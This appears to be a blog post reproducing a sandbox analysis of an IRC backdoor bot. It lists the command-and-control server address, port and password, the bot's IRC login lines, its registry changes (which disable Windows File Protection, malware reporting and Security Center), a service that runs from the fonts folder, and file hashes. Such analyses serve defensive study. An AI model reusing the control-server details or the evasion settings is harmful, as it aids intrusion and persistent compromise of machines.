210.166.223.51(Mouse’s net)

Remote Host Port Number
210.166.223.51 3305 PASS secretpass

NICK P|fpt5tg83v
USER azrqhtwi7 * 0 :USA|XP|706
USERHOST P|fpt5tg83v
MODE P|fpt5tg83v
JOIN #h-r xh10

Other details

* The following port was open in the system:

Port Protocol Process
1052 TCP uninsta.exe (%FontsDir%uninsta.exe)

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{8E899F5A-F1AA-76AE-F1AA-76AEF1AA76AE}
o HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{8E899F5A-F1AA-76AE-F1AA-76AEF1AA76AE}InprocServer32
o HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{8E899F5A-F1AA-76AE-F1AA-76AEF1AA76AE}InprocServer322.0.50727
o HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{8E899F5A-F1AA-76AE-F1AA-76AEF1AA76AE}Server
o HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsWindowsUpdate
o HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftMRT
o HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows NT
o HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows NTWindows File Protection
o HKEY_LOCAL_MACHINESOFTWARELicenses
o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081
o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000
o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000Control
o HKEY_LOCAL_MACHINESYSTEMControlSet001Services?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o HKEY_LOCAL_MACHINESYSTEMControlSet001Services?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Security
o HKEY_LOCAL_MACHINESYSTEMControlSet001Services?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Enum
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000Control
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Security
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Enum

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{8E899F5A-F1AA-76AE-F1AA-76AEF1AA76AE}InprocServer322.0.50727]
+ ImplementedInThisVersion = “”
+ (Default) = “2.0.50727”
o [HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{8E899F5A-F1AA-76AE-F1AA-76AEF1AA76AE}Server]
+ (Default) = “diasymreader.dll”
o [HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{8E899F5A-F1AA-76AE-F1AA-76AEF1AA76AE}InprocServer32]
+ (Default) = “mscoree.dll”
+ ThreadingModel = “Both”
o [HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{8E899F5A-F1AA-76AE-F1AA-76AEF1AA76AE}]
+ (Default) = “Pdb based CorSymWriter”
o [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsWindowsUpdate]
+ DoNotAllowXPSP2 = 0x00000001
o [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftMRT]
+ DontReportInfectionInformation = 0x00000001
o [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows NTWindows File Protection]
+ SFCDisable = 0xFFFFFF9D
+ SFCScan = 0x00000000
o [HKEY_LOCAL_MACHINESOFTWARELicenses]
+ {K7C0DB872A3F777C0} = 83 6C 90 8F 88 10 1F 68 77 3F 6D 07 1E 46 2E 03 07 99 01 65 14 0F C8 1F F3 29 FB 4A 8D 7D 4C FF FF FF FF 87 30 0C C3 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF F
+ {IF106C3E13EC6EFFB} = 06 00 00 00
o [HKEY_LOCAL_MACHINESYSTEMControlSet001Control]
+ WaitToKillServiceT = “5000”
o [HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000Control]
+ *NewlyCreated* = 0x00000000
+ ActiveService = “?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����”
o [HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000]
+ Service = “?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����”
+ Legacy = 0x00000001
+ ConfigFlags = 0x00000000
+ Class = “LegacyDriver”
+ ClassGUID = “{8ECC055D-047F-11D1-A537-0000F8753ED1}”
+ DeviceDesc = “?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����”
o [HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081]
+ NextInstance = 0x00000001
o [HKEY_LOCAL_MACHINESYSTEMControlSet001Services?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Enum]
+ 0 = “RootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000”
+ Count = 0x00000001
+ NextInstance = 0x00000001
o [HKEY_LOCAL_MACHINESYSTEMControlSet001Services?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Security]
+ Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0
o [HKEY_LOCAL_MACHINESYSTEMControlSet001Services?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����]
+ Type = 0x00000110
+ Start = 0x00000002
+ ErrorControl = 0x00000000
+ ImagePath = “”%FontsDir%uninsta.exe””
+ DisplayName = “?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����”
+ ObjectName = “LocalSystem”
+ FailureActions = 0A 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 B8 0B 00 00
+ Description = “?}n�DI6f?�oE?����3���r’c������?�k
o [�䯇������H?��ӈ�~�b-��ذ�G ��o�|YC.p]
+ ��?$�h������,’����� �?�Q” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControl
+ ��?$�h������,’����� �?�Q” = HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionInternet Settings
o [WaitToKillServiceT]
+ “5000” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000Control
o [*NewlyCreated*]
+ 0x00000000 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000Control
o [ActiveService]
+ “?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000
o [Service]
+ “?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000
o [Legacy]
+ 0x00000001 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000
o [ConfigFlags]
+ 0x00000000 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000
o [Class]
+ “LegacyDriver” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000
o [ClassGUID]
+ “{8ECC055D-047F-11D1-A537-0000F8753ED1}” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000
o [DeviceDesc]
+ “?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081
o [NextInstance]
+ 0x00000001 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Enum
+ 0x00000001 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Security
o [0]
+ “RootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Enum
o [Count]
+ 0x00000001 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Enum
o [Security]
+ 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o [Type]
+ 0x00000110 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o [Start]
+ 0x00000002 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o [ErrorControl]
+ 0x00000000 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o [ImagePath]
+ “”%FontsDir%uninsta.exe”” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o [DisplayName]
+ “?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o [ObjectName]
+ “LocalSystem” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o [FailureActions]
+ 0A 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 B8 0B 00 00 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o [Description]
+ “?}n�DI6f?�oE?����3���r’c������?�k = �䯇������H?��ӈ�~�b-��ذ�G ��o�|YC.p
o [��?$�h������,’����� �?�Q”]
+ HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionInternet Settings = MaxConnectionsPer1_0Server
o [0x0000FFFE]
+ HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionInternet Settings = MaxConnectionsPerServer
o [MaxConnectionsPer1_0Server]
+ 0x0000FFFE = HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionInternet Settings
o [MaxConnectionsPerServer]
+ 0x0000FFFE = HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionInternet Settings

* The following Registry Values were modified:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle]
+ EnableDCOM =
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity Center]
+ AntiVirusOverride =
+ FirewallOverride =
o [HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsa]
+ restrictanonymous =
o [HKEY_LOCAL_MACHINESYSTEMControlSet001ControlServiceCurrent]
+ (Default) =
o [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
+ restrictanonymous =
o [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlServiceCurrent]
+ (Default) =
o [HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionExplorerShell Folders]
+ Cookies =
+ History =

Memory Modifications

* There was a new process created in the system:

Process Name Process Filename Main Module Size
uninsta.exe %FontsDir%uninsta.exe 5 505 024 bytes

* There was a new service created in the system:

Service Name Display Name Status Service Filename
?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ���� ?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ���� “Running” “%FontsDir%uninsta.exe”

* The following system services were modified:

Service Name Display Name New Status Service Filename
RemoteRegistry Remote Registry “Stopped” %System%svchost.exe -k LocalService
wscsvc Security Center “Stopped” %System%svchost.exe -k netsvcs

File System Modifications

* The following file was created in the system:

# Filename(s) File Size File Hash Alias
1 %FontsDir%uninsta.exe 626 688 bytes MD5: 0xC2F899C23ED9C7AC041C007B646522BB
SHA-1: 0x259D7C083B287C46EC39E35E23FCAFFB0485D65F Backdoor:Win32/IRCbot.gen!M [Microsoft]
packed with Armadillo [Kaspersky Lab]

* Note:
o %FontsDir% is a variable that refers to a virtual folder containing fonts. A typical path is C:WindowsFonts.

* The following Alternate Data Stream was created in the system:

# ADS name(s) ADS Size ADS Hash
1 %CommonAppData%TEMP:755E6E72 124 bytes MD5: 0x69936C4D9656BEC05BC63F64F4964ED9
SHA-1: 0xC88F3FA88EE34AF5113B4B6F1B7EB109C0CC9281

Categories: Uncategorized
Previous post
Next post